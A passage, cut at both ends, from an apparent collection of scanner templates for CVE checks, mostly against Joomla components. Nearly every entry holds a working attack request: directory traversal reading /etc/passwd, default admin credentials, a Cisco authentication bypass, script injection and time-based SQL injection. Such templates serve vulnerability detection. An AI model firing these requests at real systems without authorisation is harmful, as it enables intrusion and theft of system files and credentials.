Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1535","info":{"name":"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1474","info":{"name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1983","info":{"name":"Joomla! Component redTWITTER 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1307","info":{"name":"Joomla! Component Magic Updater - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2045","info":{"name":"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1657","info":{"name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2682","info":{"name":"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1956","info":{"name":"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1719","info":{"name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1354","info":{"name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1306","info":{"name":"Joomla! Component Picasa 2.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1495","info":{"name":"Joomla! Component Matamko 1.01 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1308","info":{"name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2680","info":{"name":"Joomla! Component jesectionfinder - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0943","info":{"name":"Joomla! Component com_jashowcase - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1345","info":{"name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1533","info":{"name":"Joomla! Component TweetLA 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1353","info":{"name":"Joomla! Component LoginBox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1313","info":{"name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1531","info":{"name":"Joomla! Component redSHOP 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2033","info":{"name":"Joomla! Percha Categories Tree 0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1875","info":{"name":"Joomla! Component Property - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1534","info":{"name":"Joomla! Component Shoutbox Pro - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1471","info":{"name":"Joomla! Component Address Book 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4282","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0696","info":{"name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1658","info":{"name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1429","info":{"name":"Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/status?full=true"],"matchers-condition":"and","matchers":[{"type":"word","words":["JVM","memory","localhost/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1469","info":{"name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2507","info":{"name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1478","info":{"name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1955","info":{"name":"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1472","info":{"name":"Joomla! Component Horoscope 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1491","info":{"name":"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1601","info":{"name":"Joomla! Component JA Comment - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1980","info":{"name":"Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2920","info":{"name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1603","info":{"name":"Joomla! Component ZiMBCore 0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2037","info":{"name":"Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0942","info":{"name":"Joomla! Component com_jvideodirect - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1979","info":{"name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5278","info":{"name":"MODx manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1957","info":{"name":"Joomla! Component Love Factory 1.3.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0944","info":{"name":"Joomla! Component com_jcollection - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1717","info":{"name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1977","info":{"name":"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1352","info":{"name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2050","info":{"name":"Joomla! Component MS Comment 0.8.0b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1304","info":{"name":"Joomla! Component User Status - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1953","info":{"name":"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0219","info":{"name":"Apache Axis2 Default Login","severity":"critical"},"requests":[{"raw":["POST /axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginUsername={{username}}&loginPassword={{password}}\n","POST /axis2/axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserName={{username}}&password={{password}}&submit=+Login+\n"],"payloads":{"username":["admin"],"password":["axis2"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","words":["<h1>Welcome to Axis2 Web Admin Module !!</h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1981","info":{"name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1470","info":{"name":"Joomla! Component Web TV 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2307","info":{"name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2035","info":{"name":"Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1607","info":{"name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1586","info":{"name":"HP System Management Homepage (SMH) v2.x.x.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/red2301.html?RedirectUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2010-1878","info":{"name":"Joomla! Component OrgChart 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1858","info":{"name":"Joomla! Component SMEStorage - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2122","info":{"name":"Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1312","info":{"name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1653","info":{"name":"Joomla! Component Graphics 1.0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1715","info":{"name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2036","info":{"name":"Joomla! Component Percha Fields Attach 1.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1475","info":{"name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2918","info":{"name":"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2259","info":{"name":"Joomla! Component com_bfsurvey - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4719","info":{"name":"Joomla! Component JRadio - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1602","info":{"name":"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1302","info":{"name":"Joomla! Component DW Graph - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3203","info":{"name":"Joomla! Component PicSell 1.0 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4231","info":{"name":"Camtron CMNC-200 IP Camera - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5028","info":{"name":"Joomla! Component JE Job 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1952","info":{"name":"Joomla! Component BeeHeard 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1219","info":{"name":"Joomla! Component com_janews - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1714","info":{"name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2001-0537","info":{"name":"Cisco IOS HTTP Configuration - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/level/16/exec/show/config/CR"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["service config","Switch","default-gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43166","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0846","info":{"name":"SpeakOut Email Petitions < 2.14.15.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=dk_speakout_sendmail&id=12+AND+(SELECT+5023+FROM+(SELECT(SLEEP(6)))Fvrh)--+VoFu\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Your signature has been added\") || contains(body, \"This petition has already been signed using your email address\")"],"condition":"and"}]}]},{"id":"CVE-2022-0785","info":{"name":"WordPress Daily Prayer Time <2022.03.01 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1\nHost: 